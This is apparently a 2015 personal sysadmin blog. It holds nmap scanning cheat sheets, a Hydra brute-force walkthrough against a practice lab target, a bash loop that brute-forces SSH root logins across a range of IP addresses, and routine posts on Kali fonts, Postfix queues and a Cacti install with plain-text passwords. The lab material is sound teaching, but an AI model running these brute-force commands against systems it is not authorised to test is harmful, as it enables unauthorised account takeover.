Wednesday, December 30, 2015

NMAP - Top Command Usage

NMAP - Top Command Usage

- nmap 192.168.56.1
- nmap 192.168.56.1-255
- nmap 192.168.56.1 –p 80
- nmap 192.168.56.0/24 –p 1-1000
- nmap 192.168.56.0/24 --exclude 192.168.1.5
- nmap 192.168.56.0/24 --exclude 192.168.1.5,192.168.1.254
- nmap -F 192.168.56.1
- nmap -v -A 192.168.56.1 (operating system and its version)
- nmap -sA 192.168.1.254
- nmap -sA 192.168.1.254  (if a firewall is in place at the target network/IP)
- nmap -PN 192.168.1.1 (In case of firewalls, Nmap has a specific parameter to scan the target)
- nmap --packet-trace 192.168.1.1 (verbosity and see whether all the packets are sent/received)
- nmap –sV 192.168.56.1  (detect different services)

Posted by at No comments:
Labels:

Tuesday, December 29, 2015

Hydra Bruteforce

Hydra Bruteforce

##############################
# 0: Simple Test Case
##############################
hydra -l root -p password attack.samsclass.info http-get /basic0/
URL: http://attack.samsclass.info/basic0

################
# 1: 3-Digit PIN
################
The username is one of these: root, admin, administrator
------------
root@vnkkali:~/Documents# cat usernames1
root
admin
administrator
-------------
create a file makepin3
root@vnkkali:~/Documents# cat makepin3
-------------------
#!/bin/bash

for i in 0 1 2 3 4 5 6 7 8 9
do
for j in 0 1 2 3 4 5 6 7 8 9
do
for k in 0 1 2 3 4 5 6 7 8 9
do
echo $i$j$k >> pin3
done
done
done
-------------------
Run this file to create a file name "pin3"

 hydra -L usernames1 -P pin3 attack.samsclass.info http-get /basic1/
URL: http://attack.samsclass.info/basic1
######################
# 2: Top 50 Passwords
######################
The username is one of these: root, admin, administrator  
downlaod the top 50 passwords and name it top50.txt and attack
hydra -L usernames1 -P top50.txt attack.samsclass.info http-get /basic2/
URL: http://attack.samsclass.info/basic2

#########################################
# 3: Top 50 Passwords + a digit (10 pts.)
#########################################
The username is one of these: root, admin, administrator
hydra -L usernames1 -P top50.txt attack.samsclass.info http-get /basic3/
URL: http://attack.samsclass.info/basic3

#############
# 4: Login Form
#############
The username is one of these: root, admin, administrator

hydra -L usernames1 -x 2:2:a attack.samsclass.info http-get-form "/brute4.php:login=^USER^pw=^PASS^:Deny"

Source: http://attack.samsclass.info/brute.htm 

# Script Brute force SSH
#!/bin/bash
for i in 124.124.124.{167..170}
do 
hydra $i ssh -l root -P top50.txt -s 22 -vV
done

#Hydra #Brutefoce 
Posted by at 1 comment:
Labels:

Monday, December 28, 2015

NMAP - Commands

NMAP - Commands

# One IP
nmap 192.168.56.1

# One Range
nmap 192.168.56.1-255

#Scan IP/Computer 
nmap -sP 192.168.56.0/24

#Check the type of the computer info:
nmap -sS -Pn -A 192.168.56.1

# scan the information of the operating system and its version
nmap -A 192.168.56.1
nmap -v -A 192.168.56.1

# check if a firewall is in place at the target network/IP
nmap -sA 192.168.1.254

# Detect different services running on the remote target
nmap –sV 192.168.56.1

# Specific port
nmap 192.168.56.1 –p 80

# Entire subnet with a specific port range
nmap 192.168.56.0/24 –p 1-1000

# Exclude host, hosts
nmap 192.168.56.0/24 --exclude 192.168.1.5
nmap 192.168.56.0/24 --exclude 192.168.1.5,192.168.1.254

# Speedy
nmap -F 192.168.56.1
Posted by at No comments:
Labels:

Install Khmer Unicode In Kali 2.0

Install Khmer Unicode In Kali 2.0



1. Download NIDA-X11-unicode-keyboard_1.0.2.tar.gz and Khmer Fonts
Download From Here

2. Extract
tar -xvf NIDA-X11-unicode-keyboard_1.0.2.tar.gz
3. Install
cd NIDA-X11-unicode-keyboard_1.0.2
./install
4. Install Fonts
copy font files to /usr/share/fonts/truetype/
and Run this command
fc-cache -f -v

5. Go to Setting and add Khmer keyboard.

Switch keyboad ( Super Key + Space)
Posted by at 2 comments:
Labels:

Sunday, December 27, 2015

Delete Mail Queue

Delete Mail Queue

#!/bin/bash
# Search user, ip or content and delete
if (! test $1)
then
  echo "Usage: $0 IP or username"
  exit 1
fi
for i in 0 1 2 3 4 5 6 7 8 9 A B C D E F
do
echo "Go to directory $i"
cd /var/spool/postfix-deliver/deferred/$i ; grep $1 * | awk '{print $3}'| postsuper -c /etc/postfix-deliver/ -d-
done
Posted by at No comments:
Labels:

Tuesday, December 1, 2015

Script Get All IPs on Eth

Script Get All IPs on Eth

#!/bin/bash
ETH=$(ip add |grep eth |cut -d: -f2 |awk '{print $1}' |grep eth)

for i in $ETH; do echo "IP on $i: "; ifconfig $i | grep inet | awk '{print $2}' |cut -d: -f2 ;done



Posted by at No comments:
Labels:

Sunday, November 1, 2015

Install Cacti - CentOS 6

Install Cacti - CentOS 6

OS: CentOS 6.5 - 64bits
IP: 124.124.124.160/24

Install Apache
yum install httpd httpd-devel
Install MySQL
yum install mysql mysql-server
Start service mysqld
/etc/init.d/mysqld start
Enable mysqld service permanently
chkconfig mysqld on
Reset password for mysql to new password is "rhce2015"
mysqladmin -u root -p password rhce2015
Install PHP
yum install php-mysql php-pear php-common php-gd php-devel php php-mbstring php-cli php-mysql
Install PHP-SNMP
yum install php-snmp
Install NET-SNMP
yum install net-snmp-utils net-snmp-libs php-pear-Net-SMTP
Install RRDtool
yum install rrdtool
Start service: Apache, MySQL and SNMP
/etc/init.d/httpd start
/etc/init.d/mysqld start
/etc/init.d/snmpd start
Enable service: Apache, MySQL and SNMP to startup
chkconfig httpd on
chkconfig mysqld on
chkconfig snmpd on
Add Repository
wget http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
rpm -ivh epel-release-6-8.noarch.rpm
Installing Cacti Tool
yum install cacti
Configure MySQL
Login to mysql as user "root" and create user and database for cacti
mysql -u root -p
mysql> create database cacti;
mysql> GRANT ALL ON cacti.* TO cacti@localhost IDENTIFIED BY 'centos65';
mysql> flush privileges;
mysql> exit
Find cacti.sql file
rpm -ql cacti | grep cacti.sql
/usr/share/doc/cacti-0.8.8b/cacti.sql
Restore default cacti database to our created database
mysql -u cacti -p cacti < /usr/share/doc/cacti-0.8.8b/cacti.sql
Edit cacti database
vi /etc/cacti/db.php
/* make sure these values refect your actual database/host/user/password */
$database_type = "mysql";
$database_default = "cacti";        ## Name of the Cacti Database ##
$database_hostname = "localhost";
$database_username = "cacti";       ## Username for Cacti database ##  
$database_password = "centos65";              ## Database password ##
$database_port = "3306";
$database_ssl = false;
/*

Configure Apache server
vi /etc/httpd/conf.d/cacti.conf
With content
Alias /cacti /usr/share/cacti
 <Directory /usr/share/cacti/>
     <IfModule mod_authz_core.c>
     # httpd 2.4
     Require host localhost
          </IfModule>
               <IfModule !mod_authz_core.c>
                 # httpd 2.2
                 Order deny,allow
                 Deny from all
                 Allow from 124.124.124.0/24
          </IfModule>
 </Directory>   
Restart Apache
/etc/init.d/httpd restart
Allow port 80 in iptables
vi /etc/sysconfig/iptables
Add this line
-A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT
Restart iptables
/etc/init.d/iptables restart
Configure Cron for Cacti
vi /etc/cron.d/cacti
with this content
*/5 * * * * cacti /usr/bin/php /usr/share/cacti/poller.php > /dev/null 2>&1

Run Cacti installer
http://124.124.124.160/cacti
New Install
Finish installation

Login into cacti with default username and password is admin.
And this page will forced us to change the default password
Loged in


Add other server:
Devices --> Add -->

Here is the sample of graph Memory Usage


#CentOS #Cacti #Vannakk

Posted by at No comments:
Labels: